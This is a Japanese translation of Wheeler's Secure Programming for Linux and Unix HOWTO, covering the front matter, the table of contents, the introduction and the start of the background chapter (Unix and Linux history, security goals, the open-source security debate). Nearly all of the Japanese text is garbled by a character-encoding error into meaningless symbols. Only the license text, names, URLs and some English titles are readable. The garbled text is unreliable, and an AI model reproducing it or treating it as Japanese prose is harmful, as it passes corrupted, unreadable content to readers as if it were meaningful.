Secure Programming for Linux and Unix HOWTO

David A. Wheeler

dwheeler@dwheeler.com

Japanese translation:

hisai@din.or.jp

v2.962 Edition

Copyright (C) 1999, 2000, 2001, 2002 by David A. Wheeler

v2.962, 12 March 2002

́̕ALinux  Unix VXeňSȃvOۂɕK
vƂȂ݌vɂāÃKChC񋟂܂Bũf[^
邽߂̃r[A[ Web AvP[V(CGI XNvg܂)Al
bg[NET[oAsetuid  setgid ĂvOΏۂłB C
 C++AJavaAPerlAPHPAPythonATCLAAda95 ʂ̃KChCfڂ
܂B

This book is Copyright (C) 1999-2002 David A. Wheeler. Permission is
granted to copy, distribute and/or modify this book under the terms of
the GNU Free Documentation License (GFDL), Version 1.1 or any later
version published by the Free Software Foundation; with the invariant
sections being ``About the Author'', with no Front-Cover Texts, and no
Back-Cover texts. A copy of the license is included in the section
entitled "GNU Free Documentation License". This book is distributed in
the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.

 

Table of Contents
1. ͂߂
2. wi
   
    2.1. Unix  LinuxAI[v\[X̓t[\tgEFAɂ
        
    2.2. ZLeB̌
    2.3. ȂvO}͊ȂR[hĂ܂̂
    2.4. I[v\[X̓ZLeBɌʂ̂
    2.5. SȃvO̎
    2.6. ^[A肪Ƃɉl
    2.7. ̃hLg ?
    2.8. ݌vƎ̎wjɂĂ̏
    2.9. ̑̃ZLeB
    2.10. hLgł̖񑩎
   
3. Linux  Unix ̃ZLeB@\
   
    3.1. vZX
    3.2. t@C
    3.3. System V IPC
    3.4. \Pbgƃlbg[Nڑ
    3.5. VOi
    3.6. Quota ƃ\[X̐
    3.7. _Ci~bNNECu
    3.8. Audit(č)
    3.9. PAM
    3.10. Unix CNȃVXeɌŗLȃZLeBg@\
   
4. ׂ͂̂Ă؂邱
   
    4.1. R}hC
    4.2. ϐ
    4.3. t@CEfBXNv^
    4.4. t@C̓e
    4.5. Web x[X̃AvP[V̓( CGI XNvg)
    4.6. ̑̓
    4.7. R(J[)̑I
    4.8. ̃GR[h
    4.9. TCgɂ܂ӂRec(Cross-site Malicious
        Content)h
    4.10. ĕ\\̂ HTML  URI ɂ̓tB^
    4.11. NGȊO̎s HTTP  GET ߂g킹Ȃ
    4.12. SPAM ɑ΍R
    4.13. ͎Ԃƕ׃xɐ
   
5. obt@I[o[t[̉
   
    5.1. C  C++ ̊댯ȂƂ
    5.2. C  C++ ł̃Cuɂ
    5.3. C  C++ ł̃RpCɂ
    5.4. ̑̌
   
6. vÕC^tF[XƓ\Ƃ邱
   
    6.1. SȃvO邽߂ɂ́A\tgEFAEGWjAO
        ̌ɏ]
    6.2. C^tF[XS
    6.3. f[^Ɛ؂藣
    6.4. ŏ
    6.5. 1 ̍\vf̋@\ŏɂ
    6.6. setuid  setgid XNvggȂ
    6.7. ݒSɂASȃftHggp
    6.8. lSɃ[h
    6.9. tFCEZ[t
    6.10. Ԃ
    6.11. MłoHM邱
    6.12. MpX(Trusted Path)݂
    6.13. ňѐ`FbNR[h𗘗p
    6.14. \[XȐ䂷
    6.15. TCgɂ܂đ݂鈫ӂRech
    6.16. Z}eBbNU̗
    6.17. f[^̎ނɋCz
   
7. ̃\[X𗘗pꍇ͐Td
   
    7.1. SȃCuE[`Ăяo
    7.2. lłĂяo
    7.3. ^LN^
    7.4. vO}̃C^tF[XĂяo
    7.5. VXeR[̕Ԃlׂ͂ă`FbN
    7.6. vfork(2)͎gȂ
    7.7. g݃Rec̓ǂݍݎɔ Web oOɑΏ
    7.8. 閧ɂ͉B
   
8. ͂肷ătB[hobN
   
    8.1. tB[hobN͍ŏ
    8.2. Rg͂Ȃ
    8.3. o͂ꂽAxꍇΏ
    8.4. f[^tH[}bg𐧌䂷(uv)
    8.5. o͎ɕ𐧌䂷
    8.6. Include t@Cݒt@Cւ̃ANZXh
   
9. ŗL̖
   
    9.1. C  C++
    9.2. Perl
    9.3. Python
    9.4. VFXNvg(sh  csh n)
    9.5. Ada
    9.6. Java
    9.7. TCL
    9.8. PHP
   
10. IȘb
   
    10.1. pX[h
    10.2. Web ̔F
    10.3. 
    10.4. [UԂł͂Ƃ킯閧(pX[h⌮)
    10.5. ÍASYƃvgR
    10.6. PAM g
    10.7. c[
    10.8. Windows CE
    10.9. čL^
    10.10. IȘRk
    10.11. ̑
   
11. _
12. Ql
A. 
B. Ƃ
C. hLg̃CZXɂ
D. GNU Free Documentation License
E. About the Author
F. {Ŏӎ

List of Tables
4-1. Legal UTF-8 Sequences

List of Figures
1-1. vOTO}

 

Chapter 1. ͂߂

                                    y󒐁F̖́A{ 
                                    V󂩂p܂B 
                                    Qƌł NIV(New International 
                                    Version)łĂ߁A 
                                    { (http://www.gospelcom.net/
                                    ibs/bibles/japanese/) ͗p܂ 
                                    łBȉlłz             
                                                                       
                                    mbl͂ЂƂŗEm̒ 
                                    肻̗݂ƂԂ𗎂ƂƂ 
                                    łB                           
                                                                       
                                               񐹏⼌ 21  22 

̕ Linux  Unix VXeňSȃvOۂɕKv
ƂȂ݌vɂāÃKChC񋟂܂B̈̕Ӑ}
AuSȃvOvƂ́AZLeB̋EɈʒuÃv
OƂ͈قȂANZXڑ̓͂vO
B̂悤ȃvOɂ́Aũf[^邽߂̃r[A[g
̂A Web AvP[V(CGI XNvg܂)Albg[NET
[oAsetuid  setgid ĂvO܂B̕ł
AIy[eBOVXẽJ[l̂̏C͈܂񂪁Aꂩ
c_錴̓J[lɑ΂ĂKpłꍇ悭܂BSȃv
Oǂ̂悤ɍ쐬邩ɂāA܂܂ȏ񌹂𒲂׉u
PvɁAKChCƂč\AL͂ɓKpł悤ɂ
 (҂̍lĂ܂)B͂̕̌A̓Iɂ C
 C++AJavaAPerlAPHPAPythonATCLA Ada95 ɌŗL̎LڂĂ
܂B

́̕Aۏ؊\tgEFAEGWjAO̍HAiۏ؂
猩g݂ɂĂ͐GĂ܂B̂悤ȎwW͑؂łA
ɂŋc_Ă܂BeXgsAEr[ARtBM[
VǗA`IȊe̕@ɓ܂BZLeBɊ֘A
JɓĂ̕ۏ؊ɂẮA the Common Criteria [CC 1999] 
the Systems Security Engineering Capability Maturity Model [SSE-CMM
1999] ɋLڂĂ܂B\tgEFAEGWjAO̍HSʂɂ
Ă Software Engineering Institute's Capability Maturity Model for
Software (SW-CMM) [Paulk 1993a, 1993b]  ISO 12207 [ISO 12207] Q
ĂBiȃVXeɂĂ̍ەWɂẮAISO 9000 
ISO 9001 [ISO 9000, 9001] QƂĂB  

̕ł́ÅɂVXelbg[NSɐݒ肷
@ɂĂ͘_܂BSȐݒ́AvOSɎgp
̂ɕK{ł邱Ƃ͖炩łASɐݒ肷邱Ƃ_hL
g͑ɂ񂠂܂B Unix CNȃVXeSɐݒ肷邱
ƂɂďqׂĂ鏑Ђɂ Garfinkel [1996]Ƃf炵i
܂BɂAAnonymous[1998]Ƃ̂܂B܂ Web TCgł
𓾂܂BƂ http://www.unixtools.com/security.html 
B Linux VXeSɐݒ肷ɂẮA܂܂ȃhL
gp\łBFenzi[1999]  Seifried[1999]AWreski[1998]ASwan
[2001]A Anonymous[1999] ɓ܂B Geodsoft [2001] ł
OpenBSD ɋłɂ邩ƂƂɉāA Unix CNȃVXe
ɖɗ񂠂܂B Linux VXe(܂Ƃ둼
Unix CNȃVXe)^[QbgɂĂȂABastille Hardening
System𒲂ׂ̂ǂł傤B̃VXe Linux Iy[eBOV
Xe苭łŌdɂ悤ƂĂ܂B Bastille ɂĒm
肽ȂA http://www.bastille-linux.org ĂBGeneral
Public License (GPL) ɂĎRɗpł܂B Windows 2000 ^
[QbgȂ Cox[2000] ̂悢ł傤BčƈSۏ(The
U.S. National Security Agency(NSA)) ́AZLeBɊւĂ̐KC
h http://nsa1.www.conxion.com ŐĂ܂B̒ɂ́Au60
Minute Network Security GuidevƂ̂܂B

Rs[^ݒ肷̂́AZLeBǗ̈ꕔɂ܂BZ
LeBǗ͍L͂ȓeJo[Ă܂BECXւ̑Ώ@
̂悤ȑgDIȃZLeBE|VKvŁAƌpv͂ǂ
AƂƓ܂ł܂BZLeBǗɂ͍ۓIȊƃK
ChC܂B ISO 13335 ͑S 5 ȂeNjJE|[g
\AZLeBǗ̎ɂȂĂ܂[ISO 13335]B܂
ISO/IEC 17799:2000 ł͍ƕW`Ă܂[ISO 17799]BK肵
ÍAugDɂāAZLeBǗAsAێ
C𕉂̐lԂɐ񋟂vƂł(Le
܂BZpł͂܂)B[̂ ISO/IEC 17799:2000 ̈ӌ
ĂƂłBxM[Ji_AtXAhCcAC^A
A{Ač͍̑ɔ΂܂Bc_ɂĂ̏ڍׂ́ANIST(National
Institute of Standards and Technology)  ISO/IEC 17799:2000 FAQ <http:
//csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf> Ă
B The Commonly Accepted Security Practices & Recommendations
(CASPR)( http://www.caspr.org)vWFNǵAZLeBW
ANpłhLg̍쐬Ɏgł܂ (N̕
̔h\ł葱悤ɁAGNU FDL CZXƂ܂
)B

͓̕ǎ҂̕Rs[^̃ZLeBʂAUnix CNȃVX
eAlbg[N( TCP/IP x[X)AC ɂėĂ邱
OɂĂ܂B̕ɂ Linux  Unix ŃZLeBێ
̂ɕKvȃvO~OEf̏񂪂܂B TCP/IP x[X̃lb
g[NSȃvgR܂ރvgR̓ɂĂɒm肽
ȂA[Murhammer 1998] ̂悤 TCP/IP SʂɂĂ̎𒲂ׂĂ
B

̕ Unix CNȃVXeSĖԗĂ܂BLinux ͂߁A
܂܂Ȍn Unix ܂ł܂A Linux ɏœ_𓖂āALinux
ɓ񋟂܂B Windows CE ɏœ_𓖂ĂƂ܂
Aۑ啔̍ڂ͓̃Iy[eBOVXeɌ肳܂B
֘AłŐGĂȂ΁Am点B

̌̕{́Ahttp://www.dwheeler.com/secure-programs ɂ܂B
̕ Linux Documentation Project (LDP) http://www.linuxdoc.org 
ꕔłA~[TCg݂Ă܂B~[ɂ LDP 
Rs[fBXgr[Vɂ̂́A{ÂȂ
̂ŒӂĂB̕ɂĈӌƏ܂A
ŐVł܂mFĂAĂB

This book is copyright (C) 1999-2001 David A. Wheeler and is covered by
the GNU Free Documentation License (GFDL); see Appendix C and
Appendix D for details.

Chapter 2 ł Unix  LinuxAZLeB̔wiɂĘ_܂B 
Chapter 3 ܂ Unix  Linux ̃ZLeBEfSʂɂĘ_Ă
܂B̃f́AZLeBɊւ鑮ƃvZXt@CVXe
̑ɂĊTς܂BāA̗̕vƂȂ Linux  Unix
VXeŃAvP[VJɓẮA݌vƎ̃KCh
C܂B͂͌̕_ Chapter 11 Œ߂ǍɎQl
ꗗƕt^ƕт܂B

vO}̊ϓ_Ƃďdvƍl鑤ʂA݌vƎɂẴKCh
C𕪗ނ܂BvO͓͂Af[^Ã\
[XĂяoAo͂𐶐܂BFigure 1-1͂}ŕ\킵Ă܂
B܂TOAZLeBEKChCׂ͂ẴJeŜ
ꂩɓĂ͂܂܂BɁuf[^vIȘbɕނ܂B
̕Ƃ́AvO̍\ւ̎gݕ(Chapter 6)Aobt@
I[o[t[(̖͂ƂČP[X܂)̉A
ŗL̏łB͂̍\́AĂė₷悤ɂĂ܂B
̍lɂƂÂÃKChC̏͗Ă͎̂悤ɂȂ܂B
ׂ̂Ă؂(Chapter 4)Aobt@I[o[t[̉ (
Chapter 5)AvÕC^tF[XƓ\Ƃ邱(
Chapter 6)Ã\[X𗘗pꍇ͐Td(Chapter 7)A͂肷
ătB[hobN (Chapter 8)AŗL̖ (Chapter 9)A
čŌɂǂ̂悤ɗ𓾂邩ƂAIȘb(Chapter 10)
ƂƂ܂B

Figure 1-1. vOTO}

[program]

 

Chapter 2. wi

                                    ĒׂƂA̓s͐ 
                                    ̉ɑ΂ĔRAt 
                                    NƂmFꂽB   
                                                                       
                                            񐹏GYL 4  19 
 

2.1. Unix  LinuxAI[v\[X̓t[\tgEFAɂ

2.1.1. Unix

1969  1970 NɂāAKenneth Thompson  Dennis Ritchie 炪
AT&T xɂāAقƂǎgĂȂ PDP-7 ŁAƂ
Iy[eBOVXeJ͂߂܂B̃Iy[eBOV
Xe͂܂Ȃ Unix Ƃ疼܂Bɒa MULTICS
ƌĂ΂ꂽIy[eBOVXeĕt܂B 1972 
1973 NɂāAC ŃVXeAɂĎvȂ
jނƂɂȂ܂B܂肱̌fɂ Unix ̓IWĩn[
hEFAƗAɐ炦ŏ̃Iy[eBOVXe
Ȃ܂B Unix ɂ͑ɂV@̋@\܂B̓x
ƃAJf~bNȃR~jeBƂ̑ʂ̂łB 1979 NɁu
seventh editionv (V7)ƌĂ΂o[W Unix [XA
Ă Unix VXeׂĂ̎nca܂B 

̎_ Unix ͂ɓ荞݂܂BAJf~bNȐE
́Ao[NCZ[_[ƂȂ Berkeley Software Distribution (BSD)
nJ܂B AT&T  Unix uSystem IIIvƂ
ŊJAꂪɁuSystem VvƂȂ܂B 1980 Ň㔼
1990 N̑OɂāA 2 ̃W[ȌnԂŁu푈vu
B̌㉽Nꂼ̌ńȀdvȋ@\̑ꂠ
܂Bpł System V uW푈vɑł(̃C^tF
[X̂قƂǂ̕WɂȂ܂)An[hEFAx_[̑啔
AT&T  System V Ɉڍs܂BASystem V  BSD ̊vVIȋZp
gݍłāAǂ 2 ̎x 1 ɓVXe
Ȃ܂B BSD h͐炦A PC n[hEFApApT[
o(Ƃ Web TCg BSD ̗ރVXegĂꍇ
)ƂčLp悤ɂȂ܂B

 seventh edition NƂ鑽ʂȃo[W Unix ݂
ʂɂȂ܂B Unix ̑啔̃o[ẂAn[hEFAx_[
LAꂼŃeiXĂ܂BƂ Sun  Solaris 
System V nłB BSD n Unix ̓ 3 ̃o[ẂAI[v\
[XɂȂ܂B FreeBSD(PC ^Cṽn[hEFAɊȒPɃCXg[
ł邱Ƃڎw) NetBSD(e CPU A[LeN`œ삷邱Ƃ
ڎw)ANetBSD ̌nɂȂ OpenBSD(ZLeBɏd_u)
܂B Unix ݂̕ɂĂɏڍׂȏ́A http://
www.datametrics.com/tech/unix/uxhistry/brf-hist.htm  http://
perso.wanadoo.fr/levenez/unix ɂ܂B BSD ݂̕ɂĂ̂ɏ
́A ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/
share/misc/bsd-family-tree ɂ܂B

OɂȂ܂AẐł[ John Kirch's paper
``Microsoft Windows NT Server 4.0 versus UNIX'' <http://web.archive.org
/web/20010801155417/www.unix-vs-nt.org/kirch> ܂B Unix
CNȃVXegƂɂāA_N܂By󒐁F
{́AMicrosoft Windows NT Server 4.0  UNIX Ƃ̔r <http://
www.anc-tv.ne.jp/~peanuts1/Translation/kirch.net/unix-nt.j.html>ɂ
܂z

 

2.1.2. Free Software Foundation

1984 N Richard Stallman  Free Software Foundation(FSF)̓t[
Unix Iy[eBOVXeグ邽߂ GNU vWFNg𗧂
グ܂B Stallman ɂ΃t[Ƃ͎RɗpłAǂނƂ
łAC\ŁAĔzzł邱ƂӖ܂B FSF ͖cȐ̖
ɗ OS ̍\vfJ܂B̒ɂ C RpC (gcc)f
炵eLXgEGfB^(emacs)̊{Iȃc[ނ܂B
A1990 N FSF ̓Iy[eBOVXẽJ[lJŖɂԂ
܂[FSF 1998]B̓J[lȂɂ͎c̃\tgEFA
ȂƂłB

 

2.1.3. Linux

1991 N Linus Torvalds ̓Iy[eBOVXẽJ[lJ
͂߁AɁuLinuxvƂO܂[Torvalds 1999]B̃J[
lɂ FSF ̐ʕƂ̑̕(BSD 炢 MIT  X Window
System)\ARɏC\łHIȃIy[eBOVXe
ƂȂ܂B̓̕J[lgwꍇɁuLinux J[lv
AŜgݍ킹̂uLinuxvƂ܂B悭guGNU/Linuxv
t́Ȃgݍ킹\tƓӖŗpꍇ唼łB

Linux R~jeBł́A܂܂ȑgDꂼɗc[gݍ
킹Ă܂Bꂼ̑gݍ킹́AufBXgr[VvƌĂ
AfBXgr[VJgDufBXgr[^vƌĂ
ł܂B悭mꂽfBXgr[Vɂ́ARed Hat  MandrakeA
SuSEACalderaA CorelADebian ܂BfBXgr[VԂɈ
͂܂ARAgăfBXgr[V\zĂ܂
BRAƂ Linux J[l GNU glibc Cuw܂B\tgE
FAƂucopyleftvX^C̃CZXɂȂĂāAÑRA
̕ύX𗘗płȂ΂ȂƂɂȂĂ܂BLinux fBXg
r[VԂɑ݂邱̋͂́ABSD  AT&T h Unix V
Xe̊Ԃɂ݂͑Ă܂B̕ł͓ Linux fBXgr
[V^[Qbgɂ͂܂B Linux ɂĘ_鎞ɂ́AOƂ
 Linux J[l̃o[W 2.2 ȏŁAC Cuo[W 2.1
ȏƂ܂B̃W[ Linux fBXgr[Vׂ͂Ă
O𖞂Ă܂B 

 

2.1.4. I[v\[Xƃt[\tgEFA

\tgEFARɋL邱Ƃɑ΂֐S܂ɂāA
`A邱ƂKvsɂȂĂ܂BuI[v\[XE\t
gEFAvƂLpĂp[OSI 1999] łɏڂ`
Ă܂B Eric Raymond[1997, 1998]͓ƑnIȘ_ŁAI[v\[XE
\tgEFAɂ邳܂܂ȊJvZXɂĐĂ܂B
1 LgĂpɁut[\tgEFAvAŌut
[vƂ́uƂĂ̎RvӖ܂B̗ƂĂ悭o
́u_̎Rvłāuvł͂ȂAłBy󒐁Ffree ɂ́Au
RvƁuvƂ 2 ̈Ӗ܂zBǂ̗pł͂
܂Bs`𖳏ŔzzłƂĂA\[XR[hȂ
ACłȂAĔzzłȂ肵̂́ut[\t
gEFAvƂ͔F߂Ȃ̂ʗłBtɁuI[v\[XvƂp
\[XR[h͌邪ApCAĔzzɐ\tgEFA
Ӗ()ꍇɎg邱Ƃ܂Bɏڂ`ɂ
Ă Open Source Definition <http://www.opensource.org/osd.html> 
B̌tg@ɈႢłꍇ܂But[\tg
EFAvƂtDȐĺAuƂĂ̎RvKvł邱Ƃ
邱ƂD݂܂BŁA̓@(ƂΐM)
ĂAdɎ咣킯ł͂Ȃ肷lgĂ
ꍇ܂Bt[\tgEFAɂĂ̒`ړIɂĂ http:/
/www.fsf.org ĂB 

I[v\[XE\tgEFAt[\tgɂĂ̎咣̐Xɋ
ȂAhttp://www.opensource.org  http://www.fsf.org ЌĂ
B̑ɂ Miller[1995]̂悤ɃI[v\[XE\tgEFAt
[\tgɂĒ܂B̒ŃI[v\[X́A
ƂLĂ\tgEFAΔĐMAƂȂĂ
(\tgEFAɑ΂ă_ȓ͂sAǂꂾNbVɑς
̂AƎɌvĂ܂)B

 

2.1.5. Linux  Unix r

̕ł́AuUnix CNȁvƂtA Unix ɎVXe
w߂ɎgĂ܂BuUnix CNȁvƂt́AW[
Unix ׂĂ Linux fBXgr[VwĂ܂BuUnixvƂ
tPɁuUnix CNȁvƓӖŎgĂlƂY
łBuUnixv AT&T JiӖ܂B
ł Open Group  Unix ̏WLĂĂ܂Bł Unix u
Eł 1  UNIX Kivƒ`Ă܂B 

Linux  Unix ̃\[XR[h󂯌pł܂񂪁AC^tF[X͂
 Unix ɎĂ܂B̂߁AUnix ̍u`Ŋw񂾂Ƃ̓ZLe
B̒m܂߂ĂقƂǂǂ̃VXeɂĂ͂܂܂B̕
唼̏͂ǂ Unix CNȃVXeɂĂ͂܂܂B Linux g
ƃbgoꍇɂ́A Linux ɓǉĂ܂
B

Unix CNȃVXe͂낢ƃZLeB̎dg݂LĂ܂
AɈႢ̂ŁAׂẴVXeł̎dgׂ݂ėpł
킯ł͂܂BvZXɑ΂郆[UO[v ID(uid  gid)ƃt
@CVXeɑ΂ǂݏAs([UO[vȂ)͂
ẴVXeŗpł܂B Thompson[1974] Bach[1986]ɂ Unix VX
eʂɂĂ̏񂪂A{IȃZLeB̎dg݂ɂĂG
Ă܂B Chapter 3 ł Unix  Linux ̃ZLeB@\ŌƂȂ
Ƃv񂵂܂B

 

2.2. ZLeB̌

ZLeB̌ƂāAOɗĂȂ΂ȂȂƂ
񂠂܂B Information Assurance Technical Framework(IATF)[NSA
2000]́ALZLeB𓾂̂ɓKƂłB NIST ́u
@ƂčLF߂ĂvnCxȏꏊƌĂ܂B܂
Rs[^̃ZLeBԗĂeLXgƂāA[Pfleeger 1997]
܂BŁAZLeB̌ɂĂv񂵂Ă݂܂
B

Rs[^ZLeB͑Ŝ 3 ̖ڕW܂B

 E @ێ(閧ێƂ܂)BRs[^VXe
    Y͔F؂󂯂o[ANZXł邱ƂӖ܂B
   
 E SȏԂۂBF؉ߒoċ󂯁Ao[
    YύXł邱ƂӖ܂B
   
 E pł邱ƁBo[AY֓K(VXeKv
    vɂČ܂)ANZXł܂B̖ڕWBłȂꍇ
    ́AT[rXۂƂԂɂȂ܂B
   
ɖڕWǉꍇ܂AǉڕW 3 ̖ڕW̓
ȃP[XƂĂ܂Ƃ߂Ă܂Ƃ܂BƂ΁AۂȂ
ƗڕWƂĂꍇ܂B́A葤bZ[W
ƁA󂯎葤bZ[W󂯎ƁA܂̗͂u
v\͂̂ƂłBƂA葤܂͎󂯎葤łے
ȂƂĂłBvCoV[@ێƂ͋ʂĈꍇ
܂Bf[^ł͂ȂA[U(Ƃ΃[U̐g)̋@ێ
Ƃƒ`ꍇ܂BڕẂAʂƔF؂KvƂĂꍇ
悭Aɂ͓ƗڕWƂċLڂĂꍇ܂Bč(]
Ƃ܂)̓ZLeB̖ڕWƂčD܂ƂĂ܂BlɁu
ANZXvu{lł邱Ƃ̔F؁v͕ʕƂċLڂĂꍇ
܂Bǂ̃P[XłĂAvOŜɓnāAZLeB
ڕWƈv邱ƂdvłBڕWǂ̂悤ɂ܂Ƃ߂悤ƁA̖ڕW
ɍv邱ƂdvȂ̂łB

ɂ̖͂ڕWAm̋Ђɑ΂΍Riłꍇ@Ő
Ăꍇ܂BƂ΁Ač̋sZ@ւɑ΂āAu
Gramm-Leach-Blileyv(GLB)@ƂvCoV[֘A̐V@ł܂
B̖@ł́ALlJ邱ƋyтSɂ
邱ƂK{ƂAO҂Ƃ̊ԂŋLl̊JvA
ɁA̋@ւɑ΂Čڋqf[^L~߂@^悤w
Ă܂ [Jones 2000]B

ZLeBƃVXe\tgEFÂ̑̋ZpjƂ
܂BZLeBuȒPɎgvƂWꍇ邩
BƂΈSȐݒ{ɂ́A͂̂̈Sł͂Ȃݒ
ԂKv邩܂B̑_łꍇ
͑X܂BƂΖ_悭l邱ƂŁAȒPɗpłĂ
SȃVXe\złꍇ悭܂BZLeBƒۉ(
̉B)ɂ_܂BƂ΍xȃCuE[`
ASɎĂ낤Ȃ낤Adl͉킩܂B܂
AvP[VɈS߂ꍇAmMĂȂȂAg
Ȃ΂܂B܂肻̃CuCȂ΂Ȃ
ƂƂłBȂsK؂ȃCuE[`IƁAf
̂̓[UȂ̂łB

uOIɖh䂷vƂ́AZLeBDĂ܂B
̖h@\(Kw)KꏊɔzuAUɐɂ͕̋@\U
jȂ΂ȂȂ悤ɐ݌v܂B

 

2.3. ȂvO}͊ȂR[hĂ܂̂

vO}̑́AȂR[hƂĂ킯ł͂܂
AȂĂ܂̂łBR͎Rقǂ܂BBugtraq  Aleph One 
RW߂ėv񂵂Ă܂ (1998 N 12  17 ɓe܂)B

 E قƂǂ̋@ւɂ́ARs[^̃ZLeBJL
    ܂BJLƂĂAǂ̂悤ɂĈS
    R[ĥ͘_ĂȂ̂ʂłBJL̑
    ł́AÍ@vgRƂ̕삾wKł܂B
    ͊mɏdvłAobt@I[o[t[╶̃tH[}
    bgA͂̃`FbNƂ̐EōLƂȂĂ__
    ̂ӂĂ܂B͍łdȖ_ 1 Ǝ͍lĂ
    ܂Bw𑲋ƂvO}łASȃvOǂ̂悤
    Ă悢̂ɂĂ܂mȂ̂łBɂ炸AS
    KvƂȂvÔłÂ悤ȐlXvO
    ɗ炴邦܂B
   
 E vO~ȌЂNXł́ASŊmȃvO~OZp
    Kł܂Bۍŋ߂ɂȂ܂ŁASɃvO@ɂ
    Ă̏Ђ͂܂܂ł(͐̕Ȃ̂̓ 1
    ł)B
   
 E NȌؖ@gĂ܂B
   
 E C ͈SȌł͂܂BW C CuŗpӂĂ镶
    ֌W̊֐SƂ͂܂B̓_͂Ƃ킯dłBƂ
    ̂ C ͔ɍL͂ɗpĂāA C u[lv
    ɗpƁA댯ȃZLeBz[ٔF邱ƂɂȂ܂B
   
 E vO}́u[Uv̈l܂B
   
 E vO}͐lԂŁAlԂ͕słB܂AvO}͈SȃAv
    [`uȁvAv[`肪łB܂蓮삵Ă
    ΁AォC邱Ƃ͂قƂǂ܂B
   
 E ẴvO}͗DĂƂ͂܂܂B
   
 E ẴvO}̓ZLeB֘A̐lԂł͂ȂAU̍l
    ɂ܂Ŏv܂B
   
 E ZLeBɊւĂlԂ́AĂvO}ł͂܂B
     Bugtraq ւ̓e҂̉l咣Ă邱ƂŁA^ł邩
    ǂ͂͂肵Ă܂B
   
 E Rs[^̃ZLeBEf̑唼͂Ђǂ㕨łB
   
 E \tgEFA̒ɂ́AɁuĂ܂Ăv̂Ɏg
    Ă̂񂠂܂B̃\tgEFAC(ZLe
    B̖菜A茵ZLeBE|V̌œ
    ɂ)͍̂łB
   
 E ҂̓ZLeBɖ֐SłB (lIɂ́A҂ZLe
    BɊ֐S͂߂邱Ƃ]ł܂BĂRs
    [^EVXéAɗȂǂ납Agǂ܂
    B܂҂̑́A肪邱ƂɂCÂĂȂ΂肩A
    󋵂D]ĂȂƂm܂)B 
   
 E ZLeBmۂɂ́A]vȊJԂKvɂȂ܂B
   
 E ZLeBmۂɂ́AeXg̖ʂłԂ܂(zG΃`
    [)B
   
 

2.4. I[v\[X̓ZLeBɌʂ̂

ZLeBHĂlԂɂāAI[v\[XZLeB
^eɂāA̋c_ȂĂ܂BȘ__ 1 ɁA
I[v\[X̓\[XR[hJĂ̂ŁANł܂UƖh
䑤̂ǂ\[XR[h𒲂ׂƂ̂܂B̏
Iȉe͂ƂɁAIȐlтƂ͓ӂĂ܂B

ŁÃgsbNɂĒĂXlЉ܂B Bruce
Schneier ́AuȋZp҂ȂAZLeBɊ֘Aׂ͂ăI
[v\[X̃R[hɋ߂ǂv[Schneier 1999]ƂĂ܂B܂
I[v\[Xȃ\tgEFASɂɕK{̏_
܂B Advanced Encryption Standard (AES)̈ÍASY
J҂ł Vincent Rijmen ́AZLeB̐Ǝ㐫ȒPɌ
oAĈɂ Linux ̃I[v\[X̓̏Ȃ
iłƍlĂ܂Bu葽̐lXƂƈȏɏdv
̂́ÃfɂāA薾ȃR[hƁAW炷邱
Ƃ݂ȂɋĂ_łB̓ZLeBEr[X[Y
ɌJԂsƂɑȂ܂v [Rijmen 2000] ƂĂ܂B Elias
Levy (Aleph1) ͔ނ̘_ł "Is Open Source Really More Secure
than Closed?" <http://www.securityfocus.com/commentary/19> ŃI[v\
[X̃\tgEFASɂł̖__Ă܂Bv񂵂Ă݂
ƉL̂悤ɂȂ܂B

   
    ܂AZLeB̐Ǝ㐫ɁAI[v\[XƂ
    Ȃ\tgEFA͑卷Ȃ̂ł傤B͈Ⴂ܂BI[v
    \[X̃\tgEFA͂łȂ\tgEFAAƈSɂ
    錩݂mɂ܂BႢȂŗ~̂́APɃI[
    v\[XƂăZLeBۏ؂킯ł͖Ƃ
    ƂłB
   
John Viega ̘_ł "The Myth of Open Source Security" <http://
dev-opensourceit.earthweb.com/news/000526_security.html> ͂̓__
Ă܂Bv񂵂Ă݂ƉL̂悤ɂȂ܂B

   
    I[v\[X̃\tgEFAEvWFNǵAłȂvWFN
    g̃\tgEFASɂȂ͂߂Ă܂BI[v\
    [X̃vOSɂȂǂłA\[XR[hp
    邱ƁÃ[UZLeBz[ĂC
    łƂ́Al܂ĈS邱ƂɂȂ蓾܂B
   
Michael H. Warfield's "Musings on open source security" <http://
www.linuxworld.com/linuxworld/lw-1998-11/lw-11-ramparts.html> ͂
mMāAI[v\[XZLeBɑ΂ĉe͂Ƃ
Ă܂B Fred Schneider ̓I[v\[X̓ZLeBɖɗ
Ƃ͍lĂ炸Au̖ڂ(I[v)\[Xɒ邱ƂŁAV
XẽZLeB낤Ă܂oO𔭌łƐMɑ闝
R͂܂vƂA܂uR[hɊ܂܂ĂoOAU@Ƃ
łĂ킯ł͂܂v [Schneider 2000]Ƃ咣Ă܂B
܂I[v\[X́AvO\zH̊ǗlĂȂAƂ
Ă܂Aۂɂ͊Ǘ݂͑Ă܂BI[v\[X̃W[
ȃvOׂẮAuӔCҁv̖ʖڂɂč쐬o[W
݂܂B Peter G. Neumann ́uI[vE{bNXv\tg
EFA(\[XR[h󋵉ł݂̂ŋ炭p\)_ĂāA
̒ŁuI[vE{bNXł\tgEFA̓VXẽZLeB
{ɉP̂낤HRƂȂ킯ł͂ȂB\͖
łȂv[Neumann 2000]ƂĂ܂B TruSecure Corporation Ƃ Red
Hat(I[v\[XŊƊĂ)񋟂ĂƂ́AI[v
\[XȂZLeBɗLłƎvĂ̂Ђɂ܂Ƃ
܂[TruSecure 2001]B Natalie Walker Whitlock's IBM DeveloperWorks
article <http://www-106.ibm.com/developerworks/linux/library/
l-oss.html?open&I=252,t=gr,p=SeclmpOS> ł͎^ۗ_ڂĂ܂By
FNatalie Walker Whitlock's IBM DeveloperWorks article ̓{́A
http://www-6.ibm.com/jp/developerworks/linux/010615/j_l-oss.html ɂ
܂zB Brian Witten  Carl Landwehr AMicahel Caloyannides 
[Witten 2001]  IEEE ̃\tgEFA֘A_Ń\[XR[hpł
ƁAVXẽZLeBɍDsɕ^Ԃ͂AƍT߂Ɍ_Â
Ă܂BނɂƁA

   
    úA̋c_炳 4 ̌_o܂BɁA\
    [XR[hɃANZXł΁A[UVXẽZLeBP
    ł悤ɂȂ܂B̂悤ȍ˔\ƐlނȂ΂łB
    ɁAꂽeXgł͈ꕔ̃P[XwEł܂񂪁AI[v\
